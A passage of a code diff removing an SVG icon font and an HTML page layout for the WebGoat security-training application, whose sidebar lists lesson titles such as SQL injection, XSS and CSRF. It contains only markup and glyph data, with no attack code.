-<glyph unicode="&#xe140;" d="M0 0v400l129 -129l200 200l142 -142l-200 -200l129 -129h-400zM0 800l129 129l200 -200l142 142l-200 200l129 129h-400v-400zM729 329l142 142l200 -200l129 129v-400h-400l129 129zM729 871l200 200l-129 129h400v-400l-129 129l-200 -200z" />
-<glyph unicode="&#xe141;" d="M0 596q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM182 596q0 -172 121.5 -293t292.5 -121t292.5 121t121.5 293q0 171 -121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM291 655 q0 23 15.5 38.5t38.5 15.5t39 -16t16 -38q0 -23 -16 -39t-39 -16q-22 0 -38 16t-16 39zM400 850q0 22 16 38.5t39 16.5q22 0 38 -16t16 -39t-16 -39t-38 -16q-23 0 -39 16.5t-16 38.5zM513 609q0 32 21 56.5t52 29.5l122 126l1 1q-9 14 -9 28q0 22 16 38.5t39 16.5 q22 0 38 -16t16 -39t-16 -39t-38 -16q-16 0 -29 10l-55 -145q17 -22 17 -51q0 -36 -25.5 -61.5t-61.5 -25.5q-37 0 -62.5 25.5t-25.5 61.5zM800 655q0 22 16 38t39 16t38.5 -15.5t15.5 -38.5t-16 -39t-38 -16q-23 0 -39 16t-16 39z" />
-<glyph unicode="&#xe142;" d="M-40 375q-13 -95 35 -173q35 -57 94 -89t129 -32q63 0 119 28q33 16 65 40.5t52.5 45.5t59.5 64q40 44 57 61l394 394q35 35 47 84t-3 96q-27 87 -117 104q-20 2 -29 2q-46 0 -79.5 -17t-67.5 -51l-388 -396l-7 -7l69 -67l377 373q20 22 39 38q23 23 50 23q38 0 53 -36 q16 -39 -20 -75l-547 -547q-52 -52 -125 -52q-55 0 -100 33t-54 96q-5 35 2.5 66t31.5 63t42 50t56 54q24 21 44 41l348 348q52 52 82.5 79.5t84 54t107.5 26.5q25 0 48 -4q95 -17 154 -94.5t51 -175.5q-7 -101 -98 -192l-252 -249l-253 -256l7 -7l69 -60l517 511 q67 67 95 157t11 183q-16 87 -67 154t-130 103q-69 33 -152 33q-107 0 -197 -55q-40 -24 -111 -95l-512 -512q-68 -68 -81 -163z" />
-<glyph unicode="&#xe143;" d="M79 784q0 131 99 229.5t230 98.5q144 0 242 -129q103 129 245 129q130 0 227 -98.5t97 -229.5q0 -46 -17.5 -91t-61 -99t-77 -89.5t-104.5 -105.5q-197 -191 -293 -322l-17 -23l-16 23q-43 58 -100 122.5t-92 99.5t-101 100l-84.5 84.5t-68 74t-60 78t-33.5 70.5t-15 78z M250 784q0 -27 30.5 -70t61.5 -75.5t95 -94.5l22 -22q93 -90 190 -201q82 92 195 203l12 12q64 62 97.5 97t64.5 79t31 72q0 71 -48 119.5t-106 48.5q-73 0 -131 -83l-118 -171l-114 174q-51 80 -124 80q-59 0 -108.5 -49.5t-49.5 -118.5z" />
-<glyph unicode="&#xe144;" d="M57 353q0 -94 66 -160l141 -141q66 -66 159 -66q95 0 159 66l283 283q66 66 66 159t-66 159l-141 141q-12 12 -19 17l-105 -105l212 -212l-389 -389l-247 248l95 95l-18 18q-46 45 -75 101l-55 -55q-66 -66 -66 -159zM269 706q0 -93 66 -159l141 -141l19 -17l105 105 l-212 212l389 389l247 -247l-95 -96l18 -18q46 -46 77 -99l29 29q35 35 62.5 88t27.5 96q0 93 -66 159l-141 141q-66 66 -159 66q-95 0 -159 -66l-283 -283q-66 -64 -66 -159z" />
-<glyph unicode="&#xe145;" d="M200 100v953q0 21 30 46t81 48t129 38t163 15t162 -15t127 -38t79 -48t29 -46v-953q0 -41 -29.5 -70.5t-70.5 -29.5h-600q-41 0 -70.5 29.5t-29.5 70.5zM300 300h600v700h-600v-700zM496 150q0 -43 30.5 -73.5t73.5 -30.5t73.5 30.5t30.5 73.5t-30.5 73.5t-73.5 30.5 t-73.5 -30.5t-30.5 -73.5z" />
-<glyph unicode="&#xe146;" d="M0 0l303 380l207 208l-210 212h300l267 279l-35 36q-15 14 -15 35t15 35q14 15 35 15t35 -15l283 -282q15 -15 15 -36t-15 -35q-14 -15 -35 -15t-35 15l-36 35l-279 -267v-300l-212 210l-208 -207z" />
-<glyph unicode="&#xe148;" d="M295 433h139q5 -77 48.5 -126.5t117.5 -64.5v335l-27 7q-46 14 -79 26.5t-72 36t-62.5 52t-40 72.5t-16.5 99q0 92 44 159.5t109 101t144 40.5v78h100v-79q38 -4 72.5 -13.5t75.5 -31.5t71 -53.5t51.5 -84t24.5 -118.5h-159q-8 72 -35 109.5t-101 50.5v-307l64 -14 q34 -7 64 -16.5t70 -31.5t67.5 -52t47.5 -80.5t20 -112.5q0 -139 -89 -224t-244 -96v-77h-100v78q-152 17 -237 104q-40 40 -52.5 93.5t-15.5 139.5zM466 889q0 -29 8 -51t16.5 -34t29.5 -22.5t31 -13.5t38 -10q7 -2 11 -3v274q-61 -8 -97.5 -37.5t-36.5 -102.5zM700 237 q170 18 170 151q0 64 -44 99.5t-126 60.5v-311z" />
-<glyph unicode="&#xe149;" d="M100 600v100h166q-24 49 -44 104q-10 26 -14.5 55.5t-3 72.5t25 90t68.5 87q97 88 263 88q129 0 230 -89t101 -208h-153q0 52 -34 89.5t-74 51.5t-76 14q-37 0 -79 -14.5t-62 -35.5q-41 -44 -41 -101q0 -11 2.5 -24.5t5.5 -24t9.5 -26.5t10.5 -25t14 -27.5t14 -25.5 t15.5 -27t13.5 -24h242v-100h-197q8 -50 -2.5 -115t-31.5 -94q-41 -59 -99 -113q35 11 84 18t70 7q32 1 102 -16t104 -17q76 0 136 30l50 -147q-41 -25 -80.5 -36.5t-59 -13t-61.5 -1.5q-23 0 -128 33t-155 29q-39 -4 -82 -17t-66 -25l-24 -11l-55 145l16.5 11t15.5 10 t13.5 9.5t14.5 12t14.5 14t17.5 18.5q48 55 54 126.5t-30 142.5h-221z" />
-<glyph unicode="&#xe150;" d="M2 300l298 -300l298 300h-198v900h-200v-900h-198zM602 900l298 300l298 -300h-198v-900h-200v900h-198z" />
-<glyph unicode="&#xe151;" d="M2 300h198v900h200v-900h198l-298 -300zM700 0v200h100v-100h200v-100h-300zM700 400v100h300v-200h-99v-100h-100v100h99v100h-200zM700 700v500h300v-500h-100v100h-100v-100h-100zM801 900h100v200h-100v-200z" />
-<glyph unicode="&#xe152;" d="M2 300h198v900h200v-900h198l-298 -300zM700 0v500h300v-500h-100v100h-100v-100h-100zM700 700v200h100v-100h200v-100h-300zM700 1100v100h300v-200h-99v-100h-100v100h99v100h-200zM801 200h100v200h-100v-200z" />
-<glyph unicode="&#xe153;" d="M2 300l298 -300l298 300h-198v900h-200v-900h-198zM800 100v400h300v-500h-100v100h-200zM800 1100v100h200v-500h-100v400h-100zM901 200h100v200h-100v-200z" />
-<glyph unicode="&#xe154;" d="M2 300l298 -300l298 300h-198v900h-200v-900h-198zM800 400v100h200v-500h-100v400h-100zM800 800v400h300v-500h-100v100h-200zM901 900h100v200h-100v-200z" />
-<glyph unicode="&#xe155;" d="M2 300l298 -300l298 300h-198v900h-200v-900h-198zM700 100v200h500v-200h-500zM700 400v200h400v-200h-400zM700 700v200h300v-200h-300zM700 1000v200h200v-200h-200z" />
-<glyph unicode="&#xe156;" d="M2 300l298 -300l298 300h-198v900h-200v-900h-198zM700 100v200h200v-200h-200zM700 400v200h300v-200h-300zM700 700v200h400v-200h-400zM700 1000v200h500v-200h-500z" />
-<glyph unicode="&#xe157;" d="M0 400v300q0 165 117.5 282.5t282.5 117.5h300q162 0 281 -118.5t119 -281.5v-300q0 -165 -118.5 -282.5t-281.5 -117.5h-300q-165 0 -282.5 117.5t-117.5 282.5zM200 300q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5 h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500z" />
-<glyph unicode="&#xe158;" d="M0 400v300q0 163 119 281.5t281 118.5h300q165 0 282.5 -117.5t117.5 -282.5v-300q0 -165 -117.5 -282.5t-282.5 -117.5h-300q-163 0 -281.5 117.5t-118.5 282.5zM200 300q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5 h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500zM400 300l333 250l-333 250v-500z" />
-<glyph unicode="&#xe159;" d="M0 400v300q0 163 117.5 281.5t282.5 118.5h300q163 0 281.5 -119t118.5 -281v-300q0 -165 -117.5 -282.5t-282.5 -117.5h-300q-165 0 -282.5 117.5t-117.5 282.5zM200 300q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5 h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500zM300 700l250 -333l250 333h-500z" />
-<glyph unicode="&#xe160;" d="M0 400v300q0 165 117.5 282.5t282.5 117.5h300q165 0 282.5 -117.5t117.5 -282.5v-300q0 -162 -118.5 -281t-281.5 -119h-300q-165 0 -282.5 118.5t-117.5 281.5zM200 300q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5 h-500q-41 0 -70.5 -29.5t-29.5 -70.5v-500zM300 400h500l-250 333z" />
-<glyph unicode="&#xe161;" d="M0 400v300h300v200l400 -350l-400 -350v200h-300zM500 0v200h500q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5h-500v200h400q165 0 282.5 -117.5t117.5 -282.5v-300q0 -165 -117.5 -282.5t-282.5 -117.5h-400z" />
-<glyph unicode="&#xe162;" d="M216 519q10 -19 32 -19h302q-155 -438 -160 -458q-5 -21 4 -32l9 -8l9 -1q13 0 26 16l538 630q15 19 6 36q-8 18 -32 16h-300q1 4 78 219.5t79 227.5q2 17 -6 27l-8 8h-9q-16 0 -25 -15q-4 -5 -98.5 -111.5t-228 -257t-209.5 -238.5q-17 -19 -7 -40z" />
-<glyph unicode="&#xe163;" d="M0 400q0 -165 117.5 -282.5t282.5 -117.5h300q47 0 100 15v185h-500q-41 0 -70.5 29.5t-29.5 70.5v500q0 41 29.5 70.5t70.5 29.5h500v185q-14 4 -114 7.5t-193 5.5l-93 2q-165 0 -282.5 -117.5t-117.5 -282.5v-300zM600 400v300h300v200l400 -350l-400 -350v200h-300z " />
-<glyph unicode="&#xe164;" d="M0 400q0 -165 117.5 -282.5t282.5 -117.5h300q163 0 281.5 117.5t118.5 282.5v98l-78 73l-122 -123v-148q0 -41 -29.5 -70.5t-70.5 -29.5h-500q-41 0 -70.5 29.5t-29.5 70.5v500q0 41 29.5 70.5t70.5 29.5h156l118 122l-74 78h-100q-165 0 -282.5 -117.5t-117.5 -282.5 v-300zM496 709l353 342l-149 149h500v-500l-149 149l-342 -353z" />
-<glyph unicode="&#xe165;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM406 600 q0 80 57 137t137 57t137 -57t57 -137t-57 -137t-137 -57t-137 57t-57 137z" />
-<glyph unicode="&#xe166;" d="M0 0v275q0 11 7 18t18 7h1048q11 0 19 -7.5t8 -17.5v-275h-1100zM100 800l445 -500l450 500h-295v400h-300v-400h-300zM900 150h100v50h-100v-50z" />
-<glyph unicode="&#xe167;" d="M0 0v275q0 11 7 18t18 7h1048q11 0 19 -7.5t8 -17.5v-275h-1100zM100 700h300v-300h300v300h295l-445 500zM900 150h100v50h-100v-50z" />
-<glyph unicode="&#xe168;" d="M0 0v275q0 11 7 18t18 7h1048q11 0 19 -7.5t8 -17.5v-275h-1100zM100 705l305 -305l596 596l-154 155l-442 -442l-150 151zM900 150h100v50h-100v-50z" />
-<glyph unicode="&#xe169;" d="M0 0v275q0 11 7 18t18 7h1048q11 0 19 -7.5t8 -17.5v-275h-1100zM100 988l97 -98l212 213l-97 97zM200 401h700v699l-250 -239l-149 149l-212 -212l149 -149zM900 150h100v50h-100v-50z" />
-<glyph unicode="&#xe170;" d="M0 0v275q0 11 7 18t18 7h1048q11 0 19 -7.5t8 -17.5v-275h-1100zM200 612l212 -212l98 97l-213 212zM300 1200l239 -250l-149 -149l212 -212l149 148l248 -237v700h-699zM900 150h100v50h-100v-50z" />
-<glyph unicode="&#xe171;" d="M23 415l1177 784v-1079l-475 272l-310 -393v416h-392zM494 210l672 938l-672 -712v-226z" />
-<glyph unicode="&#xe172;" d="M0 150v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100l200 -200v-850q0 -21 -15 -35.5t-35 -14.5h-150v400h-700v-400h-150q-21 0 -35.5 14.5t-14.5 35.5zM600 1000h100v200h-100v-200z" />
-<glyph unicode="&#xe173;" d="M0 150v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100l200 -200v-218l-276 -275l-120 120l-126 -127h-378v-400h-150q-21 0 -35.5 14.5t-14.5 35.5zM581 306l123 123l120 -120l353 352l123 -123l-475 -476zM600 1000h100v200h-100v-200z" />
-<glyph unicode="&#xe174;" d="M0 150v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100l200 -200v-269l-103 -103l-170 170l-298 -298h-329v-400h-150q-21 0 -35.5 14.5t-14.5 35.5zM600 1000h100v200h-100v-200zM700 133l170 170l-170 170l127 127l170 -170l170 170l127 -128l-170 -169l170 -170 l-127 -127l-170 170l-170 -170z" />
-<glyph unicode="&#xe175;" d="M0 150v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100l200 -200v-300h-400v-200h-500v-400h-150q-21 0 -35.5 14.5t-14.5 35.5zM600 300l300 -300l300 300h-200v300h-200v-300h-200zM600 1000v200h100v-200h-100z" />
-<glyph unicode="&#xe176;" d="M0 150v1000q0 20 14.5 35t35.5 15h250v-300h500v300h100l200 -200v-402l-200 200l-298 -298h-402v-400h-150q-21 0 -35.5 14.5t-14.5 35.5zM600 300h200v-300h200v300h200l-300 300zM600 1000v200h100v-200h-100z" />
-<glyph unicode="&#xe177;" d="M0 250q0 -21 14.5 -35.5t35.5 -14.5h1100q21 0 35.5 14.5t14.5 35.5v550h-1200v-550zM0 900h1200v150q0 21 -14.5 35.5t-35.5 14.5h-1100q-21 0 -35.5 -14.5t-14.5 -35.5v-150zM100 300v200h400v-200h-400z" />
-<glyph unicode="&#xe178;" d="M0 400l300 298v-198h400v-200h-400v-198zM100 800v200h100v-200h-100zM300 800v200h100v-200h-100zM500 800v200h400v198l300 -298l-300 -298v198h-400zM800 300v200h100v-200h-100zM1000 300h100v200h-100v-200z" />
-<glyph unicode="&#xe179;" d="M100 700v400l50 100l50 -100v-300h100v300l50 100l50 -100v-300h100v300l50 100l50 -100v-400l-100 -203v-447q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v447zM800 597q0 -29 10.5 -55.5t25 -43t29 -28.5t25.5 -18l10 -5v-397q0 -21 14.5 -35.5 t35.5 -14.5h200q21 0 35.5 14.5t14.5 35.5v1106q0 31 -18 40.5t-44 -7.5l-276 -117q-25 -16 -43.5 -50.5t-18.5 -65.5v-359z" />
-<glyph unicode="&#xe180;" d="M100 0h400v56q-75 0 -87.5 6t-12.5 44v394h500v-394q0 -38 -12.5 -44t-87.5 -6v-56h400v56q-4 0 -11 0.5t-24 3t-30 7t-24 15t-11 24.5v888q0 22 25 34.5t50 13.5l25 2v56h-400v-56q75 0 87.5 -6t12.5 -44v-394h-500v394q0 38 12.5 44t87.5 6v56h-400v-56q4 0 11 -0.5 t24 -3t30 -7t24 -15t11 -24.5v-888q0 -22 -25 -34.5t-50 -13.5l-25 -2v-56z" />
-<glyph unicode="&#xe181;" d="M0 300q0 -41 29.5 -70.5t70.5 -29.5h300q41 0 70.5 29.5t29.5 70.5v500q0 41 -29.5 70.5t-70.5 29.5h-300q-41 0 -70.5 -29.5t-29.5 -70.5v-500zM100 100h400l200 200h105l295 98v-298h-425l-100 -100h-375zM100 300v200h300v-200h-300zM100 600v200h300v-200h-300z M100 1000h400l200 -200v-98l295 98h105v200h-425l-100 100h-375zM700 402v163l400 133v-163z" />
-<glyph unicode="&#xe182;" d="M16.5 974.5q0.5 -21.5 16 -90t46.5 -140t104 -177.5t175 -208q103 -103 207.5 -176t180 -103.5t137 -47t92.5 -16.5l31 1l163 162q16 17 13 40.5t-22 37.5l-192 136q-19 14 -45 12t-42 -19l-119 -118q-143 103 -267 227q-126 126 -227 268l118 118q17 17 20 41.5 t-11 44.5l-139 194q-14 19 -36.5 22t-40.5 -14l-162 -162q-1 -11 -0.5 -32.5z" />
-<glyph unicode="&#xe183;" d="M0 50v212q0 20 10.5 45.5t24.5 39.5l365 303v50q0 4 1 10.5t12 22.5t30 28.5t60 23t97 10.5t97 -10t60 -23.5t30 -27.5t12 -24l1 -10v-50l365 -303q14 -14 24.5 -39.5t10.5 -45.5v-212q0 -21 -15 -35.5t-35 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5zM0 712 q0 -21 14.5 -33.5t34.5 -8.5l202 33q20 4 34.5 21t14.5 38v146q141 24 300 24t300 -24v-146q0 -21 14.5 -38t34.5 -21l202 -33q20 -4 34.5 8.5t14.5 33.5v200q-6 8 -19 20.5t-63 45t-112 57t-171 45t-235 20.5q-92 0 -175 -10.5t-141.5 -27t-108.5 -36.5t-81.5 -40 t-53.5 -36.5t-31 -27.5l-9 -10v-200z" />
-<glyph unicode="&#xe184;" d="M100 0v100h1100v-100h-1100zM175 200h950l-125 150v250l100 100v400h-100v-200h-100v200h-200v-200h-100v200h-200v-200h-100v200h-100v-400l100 -100v-250z" />
-<glyph unicode="&#xe185;" d="M100 0h300v400q0 41 -29.5 70.5t-70.5 29.5h-100q-41 0 -70.5 -29.5t-29.5 -70.5v-400zM500 0v1000q0 41 29.5 70.5t70.5 29.5h100q41 0 70.5 -29.5t29.5 -70.5v-1000h-300zM900 0v700q0 41 29.5 70.5t70.5 29.5h100q41 0 70.5 -29.5t29.5 -70.5v-700h-300z" />
-<glyph unicode="&#xe186;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 300h300v300h-200v100h200v100h-300v-300h200v-100h-200v-100zM600 300h200v100h100v300h-100v100h-200v-500 zM700 400v300h100v-300h-100z" />
-<glyph unicode="&#xe187;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 300h100v200h100v-200h100v500h-100v-200h-100v200h-100v-500zM600 300h200v100h100v300h-100v100h-200v-500 zM700 400v300h100v-300h-100z" />
-<glyph unicode="&#xe188;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 300h300v100h-200v300h200v100h-300v-500zM600 300h300v100h-200v300h200v100h-300v-500z" />
-<glyph unicode="&#xe189;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 550l300 -150v300zM600 400l300 150l-300 150v-300z" />
-<glyph unicode="&#xe190;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 300v500h700v-500h-700zM300 400h130q41 0 68 42t27 107t-28.5 108t-66.5 43h-130v-300zM575 549 q0 -65 27 -107t68 -42h130v300h-130q-38 0 -66.5 -43t-28.5 -108z" />
-<glyph unicode="&#xe191;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 300h300v300h-200v100h200v100h-300v-300h200v-100h-200v-100zM601 300h100v100h-100v-100zM700 700h100 v-400h100v500h-200v-100z" />
-<glyph unicode="&#xe192;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 300h300v400h-200v100h-100v-500zM301 400v200h100v-200h-100zM601 300h100v100h-100v-100zM700 700h100 v-400h100v500h-200v-100z" />
-<glyph unicode="&#xe193;" d="M-100 300v500q0 124 88 212t212 88h700q124 0 212 -88t88 -212v-500q0 -124 -88 -212t-212 -88h-700q-124 0 -212 88t-88 212zM100 200h900v700h-900v-700zM200 700v100h300v-300h-99v-100h-100v100h99v200h-200zM201 300v100h100v-100h-100zM601 300v100h100v-100h-100z M700 700v100h200v-500h-100v400h-100z" />
-<glyph unicode="&#xe194;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM400 500v200 l100 100h300v-100h-300v-200h300v-100h-300z" />
-<glyph unicode="&#xe195;" d="M0 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM182 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM400 400v400h300 l100 -100v-100h-100v100h-200v-100h200v-100h-200v-100h-100zM700 400v100h100v-100h-100z" />
-<glyph unicode="&#xe197;" d="M-14 494q0 -80 56.5 -137t135.5 -57h222v300h400v-300h128q120 0 205 86t85 208q0 120 -85 206.5t-205 86.5q-46 0 -90 -14q-44 97 -134.5 156.5t-200.5 59.5q-152 0 -260 -107.5t-108 -260.5q0 -25 2 -37q-66 -14 -108.5 -67.5t-42.5 -122.5zM300 200h200v300h200v-300 h200l-300 -300z" />
-<glyph unicode="&#xe198;" d="M-14 494q0 -80 56.5 -137t135.5 -57h8l414 414l403 -403q94 26 154.5 104t60.5 178q0 121 -85 207.5t-205 86.5q-46 0 -90 -14q-44 97 -134.5 156.5t-200.5 59.5q-152 0 -260 -107.5t-108 -260.5q0 -25 2 -37q-66 -14 -108.5 -67.5t-42.5 -122.5zM300 200l300 300 l300 -300h-200v-300h-200v300h-200z" />
-<glyph unicode="&#xe199;" d="M100 200h400v-155l-75 -45h350l-75 45v155h400l-270 300h170l-270 300h170l-300 333l-300 -333h170l-270 -300h170z" />
-<glyph unicode="&#xe200;" d="M121 700q0 -53 28.5 -97t75.5 -65q-4 -16 -4 -38q0 -74 52.5 -126.5t126.5 -52.5q56 0 100 30v-306l-75 -45h350l-75 45v306q46 -30 100 -30q74 0 126.5 52.5t52.5 126.5q0 24 -9 55q50 32 79.5 83t29.5 112q0 90 -61.5 155.5t-150.5 71.5q-26 89 -99.5 145.5 t-167.5 56.5q-116 0 -197.5 -81.5t-81.5 -197.5q0 -4 1 -12t1 -11q-14 2 -23 2q-74 0 -126.5 -52.5t-52.5 -126.5z" />
-</font>
-</defs></svg> 

newDesign/index.html

@@ -1,316 +0,0 @@
-<!DOCTYPE html>
-<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
-<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
-<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
-<!--[if gt IE 8]><!-->
-<html class="no-js">
-<!--<![endif]-->
-
-<head>
-    <meta charset="utf-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <title>WebGoat</title>
-    <meta name="description" content="">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
-    <!-- Favicon -->
-    <link rel="shortcut icon" href="assets/img/favicon.ico" type="image/x-icon">
-    <!-- Bootstrap core CSS -->
-    <link rel="stylesheet" href="assets/plugins/bootstrap/css/bootstrap.min.css">
-    <!-- Fonts from Font Awsome -->
-    <link rel="stylesheet" href="assets/css/font-awesome.min.css">
-    <!-- CSS Animate -->
-    <link rel="stylesheet" href="assets/css/animate.css">
-    <!-- Custom styles for this theme -->
-    <link rel="stylesheet" href="assets/css/main.css">
-    <!-- Vector Map  -->
-    <link rel="stylesheet" href="assets/plugins/jvectormap/css/jquery-jvectormap-1.2.2.css">
-    <!-- ToDos  -->
-    <link rel="stylesheet" href="assets/plugins/todo/css/todos.css">
-    <!-- Morris  -->
-    <link rel="stylesheet" href="assets/plugins/morris/css/morris.css">
-    <!-- Fonts -->
-    <link href='http://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,900,300italic,400italic,600italic,700italic,900italic' rel='stylesheet' type='text/css'>
-    <link href='http://fonts.googleapis.com/css?family=Open+Sans:400,700' rel='stylesheet' type='text/css'>
-    <!-- Feature detection -->
-    <script src="assets/js/modernizr-2.6.2.min.js"></script>
-    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
-    <!--[if lt IE 9]>
-    <script src="assets/js/html5shiv.js"></script>
-    <script src="assets/js/respond.min.js"></script>
-    <![endif]-->
-</head>
-
-<body class="animated fadeIn">
-    <section id="container">
-        <header id="header">
-            <!--logo start-->
-            <div class="brand">
-                <a href="index.html" class="logo"><span>Web</span>Goat</a>
-            </div>
-            <!--logo end-->
-            <div class="toggle-navigation toggle-left">
-                <button type="button" class="btn btn-default" id="toggle-left" data-toggle="tooltip" data-placement="right" title="Toggle Navigation">
-                    <i class="fa fa-bars"></i>
-                </button>
-            </div><!--toggle navigation end-->
-            <div class="lessonTitle">
-            	<h1>Lesson Title in here</h1>
-            </div><!--lesson title end-->
-            <div class="user-nav pull-right">
-            	<button type="button" class="btn btn-default" data-toggle="modal" data-target="#aboutModal">
-                	<i class="fa fa-info"></i>
-                </button>
-                <button type="button" class="btn btn-default">
-                	<i class="fa fa-envelope"></i>
-                </button>
-                <button type="button" class="btn btn-default">
-                	<i class="fa fa-user"></i>
-                </button>
-            </div>
-        </header>
-        <!--sidebar left start-->
-        <aside class="sidebar">
-            <div id="leftside-navigation" class="nano">
-                <ul class="nano-content">
-                	<li class="sub-menu">
-                        <a href=""><i class="fa fa-bars"></i><span>LESSONS</span></a>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>General</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="httpBasics.html">Http Basics</a></li>
-                            <li><a href="httpSplitting.html">Http Splitting</a></li>
-                            <li><a href="threadSafetyProblem.html">Thread Safety Problem</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"></i><span>Broken Authentication & Session Management</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Basic Authentication</a></li>
-                            <li><a href="#">Weak Authentication Code</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Broken Access Control</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Access Control Matrix</a></li>
-                            <li><a href="#">Path Based Access Control</a></li>
-                            <li><a href="#">Role Based Access Control</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Cross-Site Scripting (XSS)</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Stored XSS</a></li>
-                            <li><a href="#">Reflected XSS</a></li>
-                            <li><a href="#">CSRF</a></li>
-                            <li><a href="#">CSRF Prompt Bypass</a></li>
-                            <li><a href="#">CSRF Token Bypass</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Unvalidated Parameters</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Hidden Field Tampering</a></li>
-                            <li><a href="#">Java Script Validation</a></li>
-                            <li><a href="#">Unchecked Email</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Insecure Storage</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Encoding</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Injection Flaws</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">SQL Numeric Injection</a></li>
-                            <li><a href="#">SQL String Injection</a></li>
-                            <li><a href="#">Command Injection</a></li>
-                            <li><a href="#">Log Spoofing</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Improper Error Handling</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Fail Open Authentication</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Code Quality</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#"><span>HTML Clues</span></a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>Web Services</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">Soap Request</a></li>
-                            <li><a href="#">WSDL Scanning</a></li>
